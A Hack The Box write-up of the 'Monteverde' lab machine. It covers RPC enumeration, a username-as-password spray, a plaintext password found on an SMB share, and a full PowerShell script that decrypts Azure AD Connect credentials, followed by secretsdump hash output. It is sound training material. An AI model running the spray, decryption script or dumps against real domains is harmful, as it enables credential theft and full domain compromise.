HTB Writeup: Monteverde
What could go wrong in a synced bank?
Enumeration
nmap scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-29 17:45 IST
Nmap scan report for 10.129.134.71 (10.129.134.71)
Host is up (0.076s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-06-29 12:17:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49700/tcp open msrpc Microsoft Windows RPC
49751/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-06-29T12:18:13
|_ start_date: N/A
|_clock-skew: 5s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 204.55 seconds
-
The target machine is a domain controller for active directory. Following information is obtained from the nmap results: a. Domain: MEGABANK.LOCAL0
b. RPC is enabled.
RPC Enumeration
-
RPC connection is obtained using blank credentials
rpcclient -U '%' <IP># enumdomains name:[MEGABANK] idx:[0x0] name:[Builtin] idx:[0x0] # enumdomusers user:[Guest] rid:[0x1f5] user:[AAD_987d7f2f57d2] rid:[0x450] user:[mhope] rid:[0x641] user:[SABatchJobs] rid:[0xa2a] user:[svc-ata] rid:[0xa2b] user:[svc-bexec] rid:[0xa2c] user:[svc-netapp] rid:[0xa2d] user:[dgalanos] rid:[0xa35] user:[roleary] rid:[0xa36] user:[smorgan] rid:[0xa37] # getpwinfo min_password_length: 7 password_properties: 0x00000000 # enumdomgroups group:[Enterprise Read-only Domain Controllers] rid:[0x1f2] group:[Domain Users] rid:[0x201] group:[Domain Guests] rid:[0x202] group:[Domain Computers] rid:[0x203] group:[Group Policy Creator Owners] rid:[0x208] group:[Cloneable Domain Controllers] rid:[0x20a] group:[Protected Users] rid:[0x20d] group:[DnsUpdateProxy] rid:[0x44e] group:[Azure Admins] rid:[0xa29] group:[File Server Admins] rid:[0xa2e] group:[Call Recording Admins] rid:[0xa2f] group:[Reception] rid:[0xa30] group:[Operations] rid:[0xa31] group:[Trading] rid:[0xa32] group:[HelpDesk] rid:[0xa33] group:[Developers] rid:[0xa34] # querydispinfo index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2 Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE. index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos Name: Dimitris Galanos Desc: (null) index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope Name: Mike Hope Desc: (null) index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary Name: Ray O'Leary Desc: (null) index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null) index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan Name: Sally Morgan Desc: (null) index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata Name: svc-ata Desc: (null) index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec Name: svc-bexec Desc: (null) index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp Name: svc-netapp Desc: (null) -
A list of domain users, domain groups, and description of domain users has been obtained.
Password Spraying
-
A wordlist comprised of domain user’s usernames can be used as username and password spraying. This’ll help to identify if any user exist that has the password same as the username.
-
https://github.com/byt3bl33d3r/CrackMapExec can be used to attempt a password spray with such scenario.
cme smb MEGABANK.LOCAL -u domain_users.txt -p domain_users.txt --continue-on-success SMB MEGABANK.LOCAL 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False) SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\Guest:Guest STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\Guest:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\Guest:mhope STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\Guest:SABatchJobs STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\Guest:svc-ata STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\Guest:svc-bexec STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\Guest:svc-netapp STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\Guest:dgalanos STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\Guest:roleary STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\Guest:smorgan STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:Guest STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:mhope STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:SABatchJobs STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:svc-ata STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:svc-bexec STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:svc-netapp STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:dgalanos STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:roleary STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:smorgan STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:Guest STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:mhope STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:SABatchJobs STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:svc-ata STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:svc-bexec STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:svc-netapp STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:dgalanos STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:roleary STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:smorgan STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:Guest STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:mhope STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:svc-ata STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:svc-bexec STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:svc-netapp STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:dgalanos STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:roleary STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:smorgan STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-ata:Guest STATUS_LOGON_FAILURE SMB MEGABANK.LOCAL 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-ata:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE ... -
It is found that the user
SABatchJobshas the passwordSABatchJobs. These credentials can be used to enumerate further.
SMBMap
-
Using the credentials
SABatchJobs:SABatchJobsavailable and accessible SMB Shares can be enumerated usingsmbmapsmbmap -H MEGABANK.LOCAL -d MEGABANK.LOCAL -u SABatchJobs -p SABatchJobs SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com https://github.com/ShawnDEvans/smbmap [+] IP: 10.129.134.71:445 Name: MEGABANK.LOCAL Status: Authenticated Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin azure_uploads READ ONLY C$ NO ACCESS Default share E$ NO ACCESS Default share IPC$ READ ONLY Remote IPC NETLOGON READ ONLY Logon server share SYSVOL READ ONLY Logon server share users$ READ ONLY -
The user
SABatchJobshasREAD ONLYprivileges on following SMB Share:- azure_uploads
- users$
- SYSVOL
-
On connecting to
users$share, folders for other domain users are found.
-
Looking for interesting files, a file named
azure.xmlis found in the foldermhope -
Contents of
users$\mhope\azure.xml:<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <Obj RefId="0"> <TN RefId="0"> <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T> <T>System.Object</T> </TN> <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString> <Props> <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT> <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT> <G N="KeyId">00000000-0000-0000-0000-000000000000</G> <S N="Password">4n0therD4y@n0th3r$</S> </Props> </Obj> </Objs> -
Another credentials are obtained:
mhope:4n0therD4y@n0th3r$
User Access
-
Using the
evil-winrmand credentialsMEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$, a successful remote powershell session is obtained.
Privilege Escalation
Enumeration
-
The user
mhopeis the member of the domain groupAzure Admins, along with usersAdministratorandAAD_987d7f2f57d2.
-
Sharphound is executed with all collection methods and data is further analyzed in Bloodhound.
-
No interesting or obvious findings were made.
Azure ADConnect
-
On further enumeration, it is found the domain has Azure AD Connect service deployed. Azure AD Connects keep the Azure environment synced with local active directory. According to Microsoft documentation:
Azure AD Connect provides the following features:
- Password hash synchronization - A sign-in method that synchronizes a hash of a users on-premises AD password with Azure AD.
- Pass-through authentication - A sign-in method that allows users to use the same password on-premises and in the cloud, but doesn’t require the additional infrastructure of a federated environment.
- Federation integration - Federation is an optional part of Azure AD Connect and can be used to configure a hybrid environment using an on-premises AD FS infrastructure. It also provides AD FS management capabilities such as certificate renewal and additional AD FS server deployments.
- Synchronization - Responsible for creating users, groups, and other objects. As well as, making sure identity information for your on-premises users and groups is matching the cloud. This synchronization also includes password hashes.
- Health Monitoring - Azure AD Connect Health can provide robust monitoring and provide a central location in the Azure portal to view this activity.
Since it can Sync the complete AD and password hashes, it is implied that this service has DCSync Privileges in the domain.
-
On reading description for the user
AAD_987d7f2f57d2, it is confirmed.
-
According to Azure AD Connect for Red Teamers, the members of
Azure Adminsgroup should have read rights on databaseADSyncinMS-SQLserver which contains encrypted configuration being used for the AD Connect service.
Exploitation
-
Using the following script, the credentials from the
ADSyncdatabase can be recovered. ( Original Script from Azure AD Connect for Red Teamers might require SQL Server with remote connections enabled, which failed in current environment)Write-Host "Step 1: Gathering Key_ID, Instance_ID, and Entropy" $basic_data = (Invoke-SQLCmd "USE ADSync; SELECT keyset_id, instance_id, entropy FROM mms_server_configuration") $key_id = $basic_data.keyset_id $instance_id = new-object System.Guid($basic_data.instance_id) $entropy = new-object System.Guid($basic_data.entropy) Write-Host "Step 2: Gathering Private and Encrypted Configuration" $advanced_data = (Invoke-SQLCmd "USE ADSync; SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'") $config = $advanced_data.private_configuration_xml $crypted = $advanced_data.encrypted_configuration Write-Host "Step 3: Load mcrypt.dll and Decrypt the credentials" add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll' $km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager $km.LoadKeySet($entropy, $instance_id, $key_id) $key = $null $km.GetActiveCredentialKey([ref]$key) $key2 = $null $km.GetKey(1, [ref]$key2) $decrypted = $null $key2.DecryptBase64ToString($crypted, [ref]$decrypted) $domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}} $username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}} $password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}} Write-Host "Recovered Azure ADSync Credentials Successfully" Write-Host ("Domain: " + $domain.Domain) Write-Host ("Username: " + $username.Username) Write-Host ("Password: " + $password.Password) -
The credentials
administrator:d0m@in4dminyeah!are recovered successfully.
-
Using the credentials, the domain hashes, cached credentials, and SAM hashes are dumped successfully via
secretsdump.pyImpacket v0.9.24 - Copyright 2021 SecureAuth Corporation [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0x192876d20aae88363bdf48202b9e82b8 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:883f830badb518441e2538599cd3e2bc::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC MEGABANK\MONTEVERDE$:aes256-cts-hmac-sha1-96:5a7a61d36799e0c3ab821f0cad6dcae0625d5c046834a4f4b24f16d6bb390f85 MEGABANK\MONTEVERDE$:aes128-cts-hmac-sha1-96:f236a2be529d6b0c01ddf8346e9b2e83 MEGABANK\MONTEVERDE$:des-cbc-md5:462a49f4b5a1f8da MEGABANK\MONTEVERDE$:plain_password_hex:f6d6354ff49f2cf13c169ec5aadb747e8450be9c257a2aaa82b8c22c31cf6bc9ca8740c46ed1b349f51fae58bab10e52c38f0e11550615321cf8eb66ede09e1678c1268e1d5b5ba34e0fb8962211763342c48a4977205a084df57b161776a99c5b803200e5bc26bcd2966e33d7503b48557db998eb72a7b733ab33ad0275e3f52e3987d313fb12f5cece27b6875569cd4ae581be009f24094b247d78cb544cd58ec20f77695584aabedf2633e7161711eeb46df90ba1b02e1fab50cbf8408790cf534d95c03a192d3ae59bae939acbcc25154d2ea7316128493696ee532876af228f4604cb5614816ac6197be1b2f9d9 MEGABANK\MONTEVERDE$:aad3b435b51404eeaad3b435b51404ee:bea2a16e3d0d4df72cde4c657710cf4c::: [*] DPAPI_SYSTEM dpapi_machinekey:0x8c1cd23a436f651c82e3d6d9f07e2d0e5a5435b5 dpapi_userkey:0xa941235813fe8db86c5c70713229c093f1f53ffb [*] NL$KM 0000 26 5F A2 C6 E9 D2 76 5E D1 EB 1F 59 86 99 03 79 &_....v^...Y...y 0010 F0 68 ED 0E 10 D1 BE 62 3A 6D 25 6C D5 A2 62 9C .h.....b:m%l..b. 0020 99 30 15 AE AB 8D 7C 3E B8 07 1A 1F F6 2A C3 DB .0....|>.....*.. 0030 F1 D0 33 56 72 7C 33 F2 E8 AE FE 39 10 12 94 F6 ..3Vr|3....9.... NL$KM:265fa2c6e9d2765ed1eb1f5986990379f068ed0e10d1be623a6d256cd5a2629c993015aeab8d7c3eb8071a1ff62ac3dbf1d03356727c33f2e8aefe39101294f6 [*] _SC_ADSync MEGABANK\AAD_987d7f2f57d2:;Sm@>Fpu-u@*FT!Ry%.*O(*pe6X%>{32W%t#o%V%F;{;f#ONA-z(D_#^$Qq#$5=cA7Y4(dvHW*b-)MbegB]m*>$r84:NTJ)%3QQHi+&E#vkevIToo3l%*LYV.5AjI{I [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:100a42db8caea588a626d3a9378cd7ea::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3480c0ed5001f14fa7a49fdf016043ff::: AAD_987d7f2f57d2:1104:aad3b435b51404eeaad3b435b51404ee:599716220acac74a2d9049230d3a8b06::: MEGABANK.LOCAL\mhope:1601:aad3b435b51404eeaad3b435b51404ee:f875f9a71efc6b0ee93dd906aedbc8b6::: MEGABANK.LOCAL\SABatchJobs:2602:aad3b435b51404eeaad3b435b51404ee:fd980edb4732d8175a52a9b5e1520bc1::: MEGABANK.LOCAL\svc-ata:2603:aad3b435b51404eeaad3b435b51404ee:d192ea098c69b7d26c50808a5ac75bea::: MEGABANK.LOCAL\svc-bexec:2604:aad3b435b51404eeaad3b435b51404ee:2e4de9439cfd99f861dec8fc460c47e3::: MEGABANK.LOCAL\svc-netapp:2605:aad3b435b51404eeaad3b435b51404ee:6bd17d9707c3da465b96cdf0e1a3a4d6::: MEGABANK.LOCAL\dgalanos:2613:aad3b435b51404eeaad3b435b51404ee:7a695f4cc64a302d8e53da58f0885736::: MEGABANK.LOCAL\roleary:2614:aad3b435b51404eeaad3b435b51404ee:cb3fa0132c099c5b29c30ef128e90ad8::: MEGABANK.LOCAL\smorgan:2615:aad3b435b51404eeaad3b435b51404ee:3a2b291c4291a1063a4b32e1770e5388::: MONTEVERDE$:1000:aad3b435b51404eeaad3b435b51404ee:bea2a16e3d0d4df72cde4c657710cf4c::: -
Using
smbexec.py, a powershell semi-interactive shell is obtained running with privileges ofNT Authority/System
The remote target is now completely compromised.
Mayank Malik
ISC2 CC | CRTP | Incident Response | Synack Red Team Member | Threat and Malware Analyst | Security Researcher
I am a tech-savvy person, Red Team Enthusiast, and like to wander around to learn new stuff. Malware Analysis, Cryptography, Networking, and System Administration are some of my forte. One of the Founding Members of CTF Team, Abs0lut3Pwn4g3. Apart from the mentioned skills, I’m good at communication skills and am a goal-driven person. Yellow belt holder at pwn.college in pursuit of learning and achieving Blue Belt.
